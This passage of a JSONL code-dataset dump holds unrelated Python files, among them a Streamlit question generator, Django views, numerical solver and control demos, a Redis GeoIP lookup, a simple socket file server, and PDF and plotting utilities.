list(section_nums_clean.values())\n existing_nums = [x for x in all_nums if len(x)>0]\n \n if len(existing_nums)==0:\n for k,v in zip(list(section_nums_clean.keys()), list(range(len(all_nums)))):\n section_nums_clean[k] = v\n elif len(all_nums[0])==0:\n fill_num = int(existing_nums[0][0])-1\n sub_num = 0\n for k,v in section_nums_clean.items():\n if len(v)>0:\n break\n else:\n section_nums_clean[k]='{}.{}'.format(fill_num, sub_num)\n sub_num+=1\n elif all_nums[0]==all_nums[1]:\n prev_num = all_nums[0]\n sub_num = 0\n \n for k,v in section_nums_clean.items():\n if v==prev_num:\n section_nums_clean[k]='{}.{}'.format(v, sub_num)\n sub_num+=1\n else:\n sub_num=0\n section_nums_clean[k]='{}.{}'.format(v, sub_num)\n \n sections_clean_numbered = {}\n for k,v in self.sections_clean.items():\n sections_clean_numbered['{} {}'.format(section_nums_clean[k], k)] = v\n return sections_clean_numbered\n \n def make_context(self, sections):\n sections_cxt = {}\n sections_copy = copy.deepcopy(sections)\n for k,v in sections_copy.items():\n cxt = ''\n for line in v:\n if re.search(r'\\s[a-z]+\\s', line):\n if re.search('^[0-9\\(\\)\\-\\–\\.]{1,6}\\s', line):\n line = re.search('(?<=\\s).*', line).group()\n cxt += ' {}'.format(re.sub(r'[^a-zA-Z0-9\\s\\(\\)\\*\\'\\\"\\.\\,\\;\\?\\!\\-\\/]+', '', line))\n sections_cxt[k] = re.sub(r'\\(.{1,17}\\)', '', cxt)\n return sections_cxt\n\ndef pdf_analyzer(path):\n pdfparser = PDF()\n pdfdict = pdfparser(path)\n return TMparser(pdfdict)\n \ndef wrap_by_word(s, n):\n '''returns a string where \\\\n is inserted between every n words'''\n a = s.split()\n ret = ''\n for i in range(0, len(a), n):\n ret += ' '.join(a[i:i+n]) + '\\n '\n\n return ret\n\n@st.cache\ndef pretty_print(content, n):\n for i in range(len(content)):\n content[i] = wrap_by_word(content[i], n)\n return content\n \n \nimport glob\n \ndef run():\n data_paths = glob.glob('data/DoD/*')\n data_names = [re.search('(?<=\\\\\\).+(?=\\.[pdfPDF]{3}$)', x).group() for x in data_paths]\n text_sources = dict(zip(data_names, data_paths))\n text_parser = {}\n text_final = {}\n text_cxt = {}\n \n name = st.sidebar.selectbox(\"Choose technical manual\", list(text_sources.keys()), 0)\n text_parser[name] = pdf_analyzer(text_sources[name])\n text_final[name] = 
text_parser[name].sections_final\n text_cxt[name] = text_parser[name].sections_final_cxt\n \n sec = st.sidebar.selectbox(\"Choose section\", list(text_final[name].keys()), 0)\n content = text_final[name][sec]\n context = text_cxt[name][sec]\n \n st.header('Keyword-Based Question Generator')\n st.markdown('***First our entity recognition algorithm searches for key words in the content below. Then our question generator creates questions for which the key words are the answers. Click the button below to give it a try!***')\n \n num_q = st.slider('Number of questions to generate', 0, 20, 8)\n if st.button(\"Generate Questions\"):\n ents = generate_keywords(context)[:num_q]\n if len(ents)>0:\n qa_pairs = generate_questions(ents, context)\n for q, a in qa_pairs:\n st.text('Question: {}\\nAnswer: {}'.format(wrap_by_word(q, 10).strip('\\n '), a))\n else:\n st.markdown('***Unfortunately no key words were found in this section. Try running this on a section with more substantive content, or try entering your own key words below!***')\n\n st.header('User-Assisted Question Generator')\n st.markdown('***If you enter your own answers in the text box below, our question generator will create a corresponding question.***')\n \n user_answer = st.text_area(\"Enter answer\", \"\")\n if st.button(\"Get Question\"):\n qa_pairs_user = generate_questions([user_answer], context)\n q_user, a_user = qa_pairs_user[0]\n st.text('Question: {}\\nAnswer: {}'.format(wrap_by_word(q_user, 10).strip('\\n '), a_user))\n \n st.header(name)\n st.subheader(sec)\n \n st.text('\\n'.join(pretty_print(content, 10)))\n\nif __name__ == \"__main__\":\n run()","sub_path":"demo_dod.py","file_name":"demo_dod.py","file_ext":"py","file_size_in_byte":24044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"132513959","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponseRedirect\nfrom django.contrib import messages\nfrom courses.forms import ReviewForm\nfrom courses.models import Review, Course\nfrom django.contrib.auth.decorators import login_required\nimport datetime\n\n\n@login_required\ndef AddReviewView(request, course_slug):\n course = get_object_or_404(Course, slug=course_slug)\n form = ReviewForm(request.POST)\n review_qr = Review.objects.filter(user=request.user, course=course)\n if review_qr.exists():\n messages.warning(request, 'You already reviewed on this course')\n return redirect('courses:course-detail', course_slug)\n else:\n if form.is_valid():\n rating = form.cleaned_data['rating']\n comment = form.cleaned_data['comment']\n review = Review()\n review.course = course\n review.pub_date = datetime.datetime.now()\n review.user = request.user\n review.comment = comment\n review.rating = rating\n review.save()\n messages.success(request, 'Successfully reviewed')\n return redirect('courses:course-detail', course_slug)\n return render(request, 'courses/course_detail.html', {'form': form, 'course': course})\n","sub_path":"courses/views/add_review.py","file_name":"add_review.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"221011984","text":"r\"\"\"\nSolve Biharmonic equation in 2D with periodic bcs in one direction\nand homogeneous Dirichlet and Neumann in the other\n\n \\nabla^4 u = f,\n\nUse Fourier basis for the periodic direction and Shen's Biharmonic\nbasis for the non-periodic direction.\n\n\"\"\"\nimport sys\nimport 
os\nfrom sympy import symbols, cos, sin, chebyshevt, pi\nimport numpy as np\nfrom shenfun import inner, div, grad, TestFunction, TrialFunction, Array, \\\n Function, TensorProductSpace, FunctionSpace, comm, la, chebyshev\n\n# Collect basis and solver from either Chebyshev or Legendre submodules\nfamily = sys.argv[-1].lower() if len(sys.argv) == 2 else 'chebyshev'\nBiharmonicSolver = chebyshev.la.Biharmonic if family == 'chebyshev' else la.SolverGeneric1ND\n\n# Use sympy to compute a rhs, given an analytical solution\nx, y = symbols(\"x,y\", real=True)\na = 1\nb = -1\nif family == 'jacobi':\n a = 0\n b = 0\nue = (sin(2*pi*x))*(1-x**2) + a*(1/2-9/16*x+1/16*chebyshevt(3, x)) + b*(1/2+9/16*x-1/16*chebyshevt(3, x))\n#ue = (sin(2*np.pi*x)*cos(2*y))*(1-x**2) + a*(0.5-0.6*x+1/10*legendre(3, x)) + b*(0.5+0.6*x-1./10.*legendre(3, x))\nfe = ue.diff(x, 4) + ue.diff(y, 4) + 2*ue.diff(x, 2, y, 2)\n\n# Size of discretization\nN = (30, 30)\n\nif family == 'chebyshev':\n assert N[0] % 2 == 0, \"Biharmonic solver only implemented for even numbers\"\n\nbcs = (ue.subs(x, -1), ue.subs(x, 1), ue.diff(x, 1).subs(x, -1), ue.diff(x, 1).subs(x, 1))\n#SD = FunctionSpace(N[0], family=family, bc='Biharmonic')\nSD = FunctionSpace(N[0], family=family, bc=bcs)\nK1 = FunctionSpace(N[1], family='F')\nT = TensorProductSpace(comm, (SD, K1), axes=(0, 1))\n\nu = TrialFunction(T)\nv = TestFunction(T)\n\n# Get f on quad points\nfj = Array(T, buffer=fe)\n\n# Compute right hand side of biharmonic equation\nf_hat = inner(v, fj)\n\n# Get left hand side of biharmonic equation\nmatrices = inner(v, div(grad(div(grad(u)))))\n\nu_hat = Function(T) # Solution spectral space\n\n# Create linear algebra solver\nH = BiharmonicSolver(matrices)\n\n# Solve and transform to real space\nu_hat = H(f_hat, u_hat) # Solve\n\n#H = la.SolverGeneric1ND(matrices)\n#u_hat = H(f_hat, u_hat)\n\nuq = u_hat.backward()\n\n# Compare with analytical solution\nuj = Array(T, buffer=ue)\nprint(abs(uj-uq).max())\nassert np.allclose(uj, uq, 1e-8)\n\nif 'pytest' not in os.environ:\n import matplotlib.pyplot as plt\n plt.figure()\n X = T.local_mesh(True) # With broadcasting=True the shape of X is local_shape, even though the number of datapoints are still the same as in 1D\n plt.contourf(X[0], X[1], uq)\n plt.colorbar()\n\n plt.figure()\n plt.contourf(X[0], X[1], uj)\n plt.colorbar()\n\n plt.figure()\n plt.contourf(X[0], X[1], uq-uj)\n plt.colorbar()\n plt.title('Error')\n #plt.show()\n","sub_path":"demo/biharmonic2D.py","file_name":"biharmonic2D.py","file_ext":"py","file_size_in_byte":2695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"234513014","text":"import importlib\nimport sys\nimport os\nimport pdb\nimport logging\n\nfrom .version import __version__\n\ntry:\n basestring\nexcept NameError:\n basestring = str\n\nfrom . import agents\nfrom .simulation import *\nfrom .environment import Environment\nfrom .history import History\nfrom . import utils\nfrom . import analysis\n\ndef main():\n import argparse\n from . 
import simulation\n\n logging.basicConfig(level=logging.INFO)\n logging.info('Running SOIL version: {}'.format(__version__))\n\n parser = argparse.ArgumentParser(description='Run a SOIL simulation')\n parser.add_argument('file', type=str,\n nargs=\"?\",\n default='simulation.yml',\n help='python module containing the simulation configuration.')\n parser.add_argument('--module', '-m', type=str,\n help='file containing the code of any custom agents.')\n parser.add_argument('--dry-run', '--dry', action='store_true',\n help='Do not store the results of the simulation.')\n parser.add_argument('--pdb', action='store_true',\n help='Use a pdb console in case of exception.')\n parser.add_argument('--graph', '-g', action='store_true',\n help='Dump GEXF graph. Defaults to false.')\n parser.add_argument('--csv', action='store_true',\n help='Dump history in CSV format. Defaults to false.')\n parser.add_argument('--output', '-o', type=str, default=\"soil_output\",\n help='folder to write results to. It defaults to the current directory.')\n parser.add_argument('--synchronous', action='store_true',\n help='Run trials serially and synchronously instead of in parallel. Defaults to false.')\n\n args = parser.parse_args()\n\n if os.getcwd() not in sys.path:\n sys.path.append(os.getcwd())\n if args.module:\n importlib.import_module(args.module)\n\n logging.info('Loading config file: {}'.format(args.file))\n\n try:\n dump = []\n if not args.dry_run:\n if args.csv:\n dump.append('csv')\n if args.graph:\n dump.append('gexf')\n simulation.run_from_config(args.file,\n dry_run=args.dry_run,\n dump=dump,\n parallel=(not args.synchronous),\n results_dir=args.output)\n except Exception:\n if args.pdb:\n pdb.post_mortem()\n else:\n raise\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"soil/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"591715513","text":"#!/usr/local/bin/python3\n# coding: UTF-8\n# Author: David\n# Email: youchen.du@gmail.com\n# Created: 2017-05-04 11:03\n# Last modified: 2017-05-04 14:25\n# Filename: main.py\n# Description:\nimport json\nimport csv\n\nimport redis\n\n\nBLOCK_FILE = 'data/GeoLiteCity-Blocks.csv'\nCITY_FILE = 'data/GeoLiteCity-Location.csv'\n\n\ndef ip_to_score(ip_addr):\n score = 0\n for v in ip_addr.split('.'):\n score = score * 256 + int(v, 10)\n return score\n\n\ndef import_ips_to_redis(conn, filename):\n if conn.exists('ip2cityid:'):\n return\n csv_file = csv.reader(open(filename))\n for count, row in enumerate(csv_file):\n start_ip = row[0] if row else ''\n if 'i' in start_ip.lower():\n continue\n if '.' 
in start_ip:\n start_ip = ip_to_score(start_ip)\n elif start_ip.isdigit():\n start_ip = int(start_ip, 10)\n else:\n continue\n\n city_id = row[2] + '_' + str(count)\n conn.zadd('ip2cityid:', city_id, start_ip)\n\n\ndef import_cities_to_redis(conn, filename):\n if conn.exists('cityid2city:'):\n return\n csv_file = csv.reader(open(filename))\n for count, row in enumerate(csv_file):\n if len(row) < 4 or not row[0].isdigit():\n continue\n city_id = row[0]\n country = row[1]\n region = row[2]\n city = row[3]\n conn.hset('cityid2city:', city_id,\n json.dumps([city, region, country]))\n\n\ndef find_city_by_ip(conn, ip_addr):\n if isinstance(ip_addr, str):\n ip_addr = ip_to_score(ip_addr)\n city_id = conn.zrevrangebyscore(\n 'ip2cityid:', ip_addr, 0, start=0, num=1)\n if not city_id:\n return None\n city_id = city_id[0].split('_')[0]\n return json.loads(conn.hget('cityid2city:', city_id))\n\n\ndef tests(conn, ip_list):\n for ip in ip_list:\n print(find_city_by_ip(conn, ip))\n\n\ndef main():\n conn = redis.Redis(decode_responses=True)\n import_ips_to_redis(conn, BLOCK_FILE)\n import_cities_to_redis(conn, CITY_FILE)\n ip_list = ['202.118.67.200', '59.46.92.105', '8.8.8.8']\n tests(conn, ip_list)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Redis/GeoIp/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"601108024","text":"import socket\r\nimport os\r\nimport shutil\r\n'''\r\npwd - shows the name of the working directory\r\nls - shows the contents of the current directory\r\ncat <filename> - sends the contents of a file\r\nmkdir <directoryname> - creates a directory\r\nrmdir <directoryname> - removes a directory\r\nremove <filename> - deletes the file at the given path\r\nrename <filename> - renames a file\r\n'''\r\n\r\ndirname = os.path.join(os.getcwd(), 'docs')\r\n\r\ndef process(req):\r\n \r\n rq = req.split()\r\n \r\n if req == 'pwd':\r\n return dirname\r\n \r\n elif req == 'ls':\r\n return '; '.join(os.listdir(dirname))\r\n \r\n elif 'cat' in req:\r\n \twith open(rq[1]) as file:\r\n \t\treturn file.read()\r\n \r\n elif 'mkdir' in req: \t\r\n \treturn os.mkdir(rq[1])\r\n \r\n elif 'rmdir' in req:\r\n \treturn shutil.rmtree(rq[1])\r\n \r\n elif 'remove' in req:\r\n \tpath = os.path.join(os.path.abspath(os.path.dirname(__file__)), rq[1])\r\n \treturn os.remove(path)\r\n \r\n elif 'rename' in req:\r\n \treturn os.rename(rq[1], rq[2])\r\n \r\n else:\r\n \treturn 'Please, check the entered data and try again.'\r\n\r\n\r\nPORT = 6666\r\n\r\nsock = socket.socket()\r\nsock.bind(('', PORT))\r\nsock.listen()\r\nprint(\"Listening on port\", PORT)\r\n\r\nwhile True:\r\n conn, addr = sock.accept()\r\n \r\n request = conn.recv(1024).decode()\r\n print(request)\r\n \r\n response = process(request)\r\n \r\n if (request=='pwd') or (request=='ls') or ('cat' in request):\r\n \tconn.send(response.encode())\r\n elif ('mkdir' in request) or ('rmdir' in request) or ('remove' in request) or ('rename' in request):\r\n \tconn.send('Your request is fulfilled'.encode())\r\n else:\r\n \tconn.send(response.encode())\r\n\r\nconn.close()\r\n","sub_path":"ftp-server.py","file_name":"ftp-server.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"603363887","text":"# Create your views here.\nfrom django.http import HttpResponse, Http404\nfrom core import models\nfrom django.shortcuts import get_object_or_404, 
render_to_response, redirect\nfrom django.template import RequestContext\nfrom django import forms\nfrom datetime import date\nfrom django.contrib.auth.forms import AuthenticationForm, UserCreationForm\nfrom django.contrib.auth.decorators import login_required\nimport datetime\nfrom django.forms import ModelForm\nimport json\nfrom django.views.decorators.http import require_http_methods, require_POST, require_GET\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate, login, logout\n\n\n#################\n##### FORMS #####\n#################\nclass TaskForm(ModelForm):\n class Meta:\n model = models.Task\n fields = ['name', 'dueDate']\n\nclass TagForm(ModelForm):\n class Meta:\n model = models.Tag\n # fields = ['name', 'dueDate']\n\n#################\n##### VIEWS #####\n#################\n\ndef index(request):\n # show tasks if authenticated\n if request.user.is_authenticated():\n user = request.user\n num_of_days = 6\n data = {'days': getStuffForDay(user, num_of_days),\n 'tags': models.Tag.objects.filter(user=user),\n 'new_tag_form': TagForm()\n }\n return render_to_response(\"tasksView.html\", data, context_instance=RequestContext(request)) \n \n # otherwise show homepage\n else:\n data = {'projectName': 'todos',\n 'successMessage': \"Great success!\",\n 'login_form': AuthenticationForm,\n 'new_user_form': UserCreationForm \n }\n return render_to_response(\"index.html\", data, context_instance=RequestContext(request))\n\n\n@require_POST\ndef doLogin(request):\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(username=username, password=password)\n if user is not None:\n if user.is_active:\n login(request, user)\n return redirect('/')\n else:\n raise Http404\n else:\n raise Http404\n\ndef doLogout(request):\n logout(request)\n return redirect('/')\n\n\n# shows the page dedicated to a particular task\n# def taskView(request, taskID):\n# return None\n\n# def addTagToTask(request, taskID, tagID):\n# return None\n\n# def removeTagFromTask(request, taskID, tagID):\n# return None\n\n# def changeTaskDueDate(request, taskID, dueDate):\n# return None\n\n# def deleteTask(request, taskID):\n# return None\n\n@require_POST\n@login_required(login_url='/')\ndef newTask(request):\n # taskID, name, tags=None,\n # dueDate, repeating=None, parentTask=None\n # name = request.POST['name']\n # dueDate = request.POST['dueDate']\n user = request.user\n\n # task = models.Task(name=name, dueDate = dueDate, user=user)\n task = models.Task(user=user)\n form = TaskForm(request.POST, instance=task)\n # task.user = user\n form.save()\n return JSONResponse({'success': True})\n\n# def markTaskCompleted(request, taskID, dateCompleted=date.today()):\n# return None\n\n# # shows a view for all of the tags\n# def getTags(request):\n# return None\n\n# def deleteTag(request):\n# return None\n\n# def createTag(request):\n# return None\n\n\n\n###################\n##### HELPERS #####\n###################\n\ndef getStuffForDay(user, num_of_days):\n days = []\n today = datetime.date.today()\n for x in xrange(num_of_days):\n date = today + datetime.timedelta(days=x)\n ghostTasks = models.GhostTask.filterForUserAndDay(user, date)\n\n if x==0: \n tasks = models.Task.objects.filter(user=user, dueDate__lte=today, complete=False)\n else:\n tasks = models.Task.objects.filter(user=user, dueDate=date, complete=False)\n\n \n new_task_form = TaskForm(initial={'dueDate': date})\n new_task_form.fields['dueDate'].widget = forms.HiddenInput()\n\n day = {\n 'date': 
date, \n 'tasks': tasks,\n 'ghostTasks': ghostTasks,\n 'new_task_form': new_task_form\n\n }\n days.append(day)\n return days\n\n\ndef JSONResponse(obj):\n return HttpResponse(json.dumps(obj),\n content_type=\"application/json\")\n\n","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"236547841","text":"import pygame\nimport context.api as ctx\n\nfrom mitsuki.util import blur_surface\nfrom mitsuki.scenes import Scene\n\n\nclass DialogScene(Scene):\n def __init__(self, parent, title=None, subtitle=None, allow_exit='no'):\n super(DialogScene, self).__init__(parent)\n\n self.title = title\n self.subtitle = subtitle\n self.allow_exit = allow_exit\n\n self.background = pygame.Surface(self.parent.display_size)\n if len(self.parent.scenes) > 0:\n blurred = blur_surface(self.parent.scenes[-1].surface)\n self.background.blit(blurred, (0, 0))\n\n def update(self):\n ctx.log_start(\"Scene(%s).update\" % self.__class__.__name__)\n self.create_surface()\n self.surface.blit(self.background, (0, 0))\n\n surfwidth, surfheight = self.parent.display_size\n\n title_height_per_line = 0\n subtitle_height_per_line = 0\n title_lines = []\n subtitle_lines = []\n\n ctx.log_start(\"splitting lines\")\n\n if self.title is not None:\n title_text_lines = self.title.split(\"\\n\")\n for line in title_text_lines:\n l = self.parent.font['title'].render(line, True, pygame.Color(self.parent.colors['text']))\n\n if l.get_height() > title_height_per_line:\n title_height_per_line = l.get_height()\n\n title_lines.append(l)\n\n if self.subtitle is not None:\n subtitle_text_lines = self.subtitle.split(\"\\n\")\n for line in subtitle_text_lines:\n l = self.parent.font['normal'].render(line, True, pygame.Color(self.parent.colors['text']))\n\n if l.get_height() > subtitle_height_per_line:\n subtitle_height_per_line = l.get_height()\n\n subtitle_lines.append(l)\n\n ctx.log_endok(\"splitting lines\")\n\n padding = 20\n between_text_padding = 2\n\n calcheight = (\n padding + \n (title_height_per_line * len(title_lines)) +\n (between_text_padding * max(len(title_lines) - 1, 0)) + \n (padding if (len(title_lines) != 0 and len(subtitle_lines) != 0) else 0)+\n (subtitle_height_per_line * len(subtitle_lines)) + \n (between_text_padding * max(len(subtitle_lines) - 1, 0)) +\n padding\n )\n\n messagesurface = pygame.Surface((surfwidth, calcheight))\n messagesurface.fill(pygame.Color(self.parent.colors['highlight']))\n\n current_y = padding\n\n ctx.log_start(\"blitting lines\")\n\n for i, line in enumerate(title_lines):\n pos = (((surfwidth / 2) - (line.get_width() / 2)), current_y)\n messagesurface.blit(line, pos)\n current_y += title_height_per_line\n if i != len(title_lines) - 1:\n current_y += between_text_padding\n\n if len(title_lines) != 0 and len(subtitle_lines) != 0:\n current_y += padding\n\n for i, line in enumerate(subtitle_lines):\n pos = (((surfwidth / 2) - (line.get_width() / 2)), current_y)\n messagesurface.blit(line, pos)\n current_y += subtitle_height_per_line\n if i < len(subtitle_lines) - 1:\n current_y += between_text_padding\n\n ctx.log_endok(\"blitting lines\")\n\n messagesurfacepos = (0, ((surfheight / 2) - (messagesurface.get_height() / 2)))\n self.surface.blit(messagesurface, messagesurfacepos)\n\n ctx.log_endok(\"Scene(%s).update\" % self.__class__.__name__)\n\n def handle_event(self, event):\n ctx.log_start(\"Scene(%s).handle_event\" % self.__class__.__name__)\n\n if 
event.type == pygame.KEYDOWN:\n if self.allow_exit == 'any':\n self.parent.scene_pop()\n elif self.allow_exit == 'escape':\n if event.key == pygame.K_ESCAPE:\n self.parent.scene_pop()\n\n ctx.log_endok(\"Scene(%s).handle_event\" % self.__class__.__name__)\n","sub_path":"mitsuki/scenes/dialog.py","file_name":"dialog.py","file_ext":"py","file_size_in_byte":3960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"223722334","text":"# Controller using the linear reactor model measuring both concentration and temperature.\n\nimport closedloop_scenarios_single.closedloop_params\nimport src.LQR as LQR\nimport src.LLDS as LLDS\nimport scipy.stats\nimport src.MPC as MPC\nimport src.Results as Results\nimport numpy\nimport matplotlib.pyplot as plt\n\ntend = 80\nparams = closedloop_scenarios_single.closedloop_params.Params(tend) # end time of simulation\n\n# Get the linear model\nlinsystems = params.cstr_model.get_nominal_linear_systems(params.h) # cstr_model comes from params.jl\nopoint = 1 # the specific operating point we are going to use for control\n\ninit_state = numpy.array([0.55, 450]) # random initial point near operating point\n\n# Set the state space model\nA = linsystems[opoint].A\nB = linsystems[opoint].B\nb = linsystems[opoint].b # offset from the origin\n\n# Set point\nysp = linsystems[opoint].op[0] - b[0] # Medium concentration\nH = numpy.matrix([1, 0]) # only attempt to control the concentration\nx_off, usp = LQR.offset(A, numpy.matrix(B), params.C2, H, numpy.array([ysp])) # control offset\nysp = x_off\nusp = numpy.array([usp])\n\n# Set up the KF\nkf_cstr = LLDS.LLDS(A, B, params.C2, params.Q, params.R2) # set up the KF object (measuring both states)\nstate_noise_dist = scipy.stats.multivariate_normal(cov=params.Q)\nmeas_noise_dist = scipy.stats.multivariate_normal(cov=params.R2)\n\n# First time step of the simulation\nparams.xs[:, 0] = init_state - b # set simulation starting point to the random initial state\nparams.ys2[:, 0] = params.C2 @ params.xs[:, 0] + meas_noise_dist.rvs() # measure from actual plant\ntemp = kf_cstr.init_filter(init_state-b, params.init_state_covar, params.ys2[:, 0]-b) # filter\nparams.kfmeans[:, 0], params.kfcovars[:, :, 0] = temp\n\nhorizon = 150\nparams.us[0] = MPC.mpc_lqr(params.kfmeans[:, 0], horizon, A, numpy.matrix(B),\n params.QQ, params.RR, numpy.array([0, 0]), numpy.array([0.0])) # get the controller input\n\nfor t in range(1, params.N):\n params.xs[:, t] = params.cstr_model.run_reactor(params.xs[:, t-1], params.us[t-1], params.h)\n params.xs[:, t] += state_noise_dist.rvs()\n\n params.ys2[:, t] = params.C2 @ params.xs[:, t] + meas_noise_dist.rvs() # measure from actual plant\n temp = kf_cstr.step_filter(params.kfmeans[:, t - 1], params.kfcovars[:, :, t - 1], params.us[t - 1],\n params.ys2[:, t]-b)\n params.kfmeans[:, t], params.kfcovars[:, :, t] = temp\n\n # Compute controller action\n if t % 10 == 0:\n params.us[t] = MPC.mpc_lqr(params.kfmeans[:, t], horizon, A,\n numpy.matrix(B), params.QQ, params.RR,\n numpy.array([0, 0]), numpy.array([0.0])) # get the controller input\n if params.us[t] is None or numpy.isnan(params.us[t]):\n break\n else:\n params.us[t] = params.us[t - 1]\n\nfor i in range(len(params.kfmeans[0])):\n params.kfmeans[:, i] += b\n\n# Plot the results\nResults.plot_tracking1(params.ts, params.xs, params.ys2, params.kfmeans, params.us, 2, ysp[0] + b[0])\nResults.calc_error1(params.xs, ysp[0] + b[0])\nResults.calc_energy(params.us, 
0.0)\nplt.show()\n","sub_path":"closedloop_scenarios_single/nonlin_mod_lqg.py","file_name":"nonlin_mod_lqg.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"81568600","text":"#!/usr/bin/python3.7\n# -*- coding: utf-8 -*-\n# @Time : 2019/7/20 13:42\n# @Email : jtyoui@qq.com\n# @Software: PyCharm\nfrom jtyoui.error import LibraryNotInstallError\nfrom jtyoui.tools import pips\nimport os\nimport glob\n\ntry:\n import fitz # 安装 pip install PyMuPDF\nexcept ModuleNotFoundError:\n try:\n fitz = pips('fitz', 'PyMuPDF') # 自动安装\n except ModuleNotFoundError:\n raise LibraryNotInstallError(\"安装 pip install PyMuPDF\")\n\n\ndef _get_dir_name(file_dir):\n base_name = os.path.basename(file_dir) # 获得地址的文件名\n dir_name = os.path.dirname(file_dir) # 获得地址的父链接\n return dir_name, base_name\n\n\ndef image_pdf(file_dir, pdf_address=None):\n \"\"\"\n 照片转pdf\n :param file_dir: 照片的地址文件夹\n :param pdf_address: 保存pdf的文件地址,默认是当前地址\n :return: 成功返回True\n \"\"\"\n dir_name, base_name = _get_dir_name(file_dir)\n doc = fitz.Document()\n for img in sorted(glob.glob(file_dir + '\\\\*'), key=os.path.getmtime): # 排序获得对象\n img_doc = fitz.Document(img) # 获得图片对象\n pdf_bytes = img_doc.convertToPDF() # 获得图片流对象\n img_pdf = fitz.Document(\"pdf\", pdf_bytes) # 将图片流创建单个的PDF文件\n doc.insertPDF(img_pdf) # 将单个文件插入到文档\n img_doc.close()\n img_pdf.close()\n if not pdf_address:\n doc.save(dir_name + os.sep + base_name + \".pdf\") # 保存文档\n else:\n doc.save(pdf_address + \".pdf\") # 保存文档\n doc.close()\n return True\n\n\ndef pdf_image(pdf_address, image_dir=None):\n \"\"\"\n PDF转照片\n :param pdf_address: PDF文件地址\n :param image_dir: 照片的文件夹地址\n :return: 成功返回True\n \"\"\"\n dir_name, base_name = _get_dir_name(pdf_address)\n pdf = fitz.Document(pdf_address)\n for pg in range(0, pdf.pageCount):\n page = pdf[pg] # 获得每一页的对象\n trans = fitz.Matrix(1.0, 1.0).preRotate(0)\n pm = page.getPixmap(matrix=trans, alpha=False) # 获得每一页的流对象\n if not image_dir:\n pm.writePNG(str(pdf_address[:-4]) + os.sep + str(base_name[:-4]) + '_{:0>4d}.jpg'.format(pg + 1)) # 保存图片\n else:\n pm.writePNG(image_dir + os.sep + str(base_name[:-4]) + '_{:0>4d}.jpg'.format(pg + 1)) # 保存图片\n pdf.close()\n return True\n\n\nif __name__ == '__main__':\n image_pdf(r'D:\\temp') # 将照片转pdf\n pdf_image(r'D:\\temp.pdf') # 将PDF转照片\n","sub_path":"jtyoui/imagepdf/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"619262374","text":"from operator import itemgetter\n\nfrom pyramid_debugtoolbar.panels import DebugPanel\n\n_ = lambda x: x\n\n\nclass PaaSDebugPanel(DebugPanel):\n \"\"\"\n PaaS debug panel\n \"\"\"\n name = 'PaaS'\n has_content = True\n\n def nav_title(self):\n return _('PaaS')\n\n def url(self):\n return ''\n\n def title(self):\n return _('PaaS')\n\n def content(self):\n d = vars(self.request.paas_env)\n if d.get('env'):\n del d['env']\n if d.get('_settings'):\n del d['_settings']\n\n paas_name = d['PAAS_NAME']\n\n env = [(k, v) for k, v in d.iteritems()]\n return self.render(\n 'pyramid_paas:paas.dbtmako',\n { 'paas': paas_name,\n 'env': sorted(env, key=itemgetter(0))},\n self.request\n )\n\n\ndef includeme(config):\n settings = config.registry.settings\n if 'debugtoolbar.panels' in settings:\n settings['debugtoolbar.panels'].append(PaaSDebugPanel)\n if not 'mako.directories' in settings:\n settings['mako.directories'] = 
[]\n","sub_path":"pyramid_paas/panel.py","file_name":"panel.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"216735039","text":"# coding=utf-8\n# date: 2018-5-29,15:48:26\n# name: smz\n\nfrom __future__ import division\nfrom __future__ import absolute_import\nfrom __future__ import print_function\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import animation\n\ndef sin_gif():\n \"\"\"\n 练习gif生成\n :return:\n \"\"\"\n fig = plt.figure()\n ax = fig.add_subplot(111)\n\n x = np.linspace(0, 2*np.pi, 200)\n y = np.sin(x)\n line_sin, = ax.plot(x, y, label='sin(x)')\n dot, = ax.plot([], [], 'ro')\n\n def init(ax=ax, line_sin=line_sin):\n ax.set_xlim(0, 2*np.pi)\n ax.set_ylim(-1, 1)\n return line_sin\n\n\n def gen_dot(): # 返回用于每帧更新的数值\n for i in np.linspace(0, 2*np.pi, 200):\n new_dot = [i, np.sin(i)]\n yield new_dot # 这里返回要跟新的数据\n\n def update_dot(new_dot, dot=dot): # 使用数值更新artist,并且返回artist\n dot.set_data(new_dot[0], new_dot[1])\n return dot\n\n ani = animation.FuncAnimation(fig=fig, func=update_dot,\n frames=gen_dot, interval=10,\n init_func=init, save_count=200)\n # 这句有点疑问,原本frames是接受一个\n # int类型的属性值,但是如果接受一个\n # int类型的话,那么update_dot就\n # 就无法使用索引了,因为传入的参数不对\n\n ani.save('./saves/sin_dot.gif', writer='imagemagick', fps=100)\n plt.show()\n\n\nif __name__ == '__main__':\n 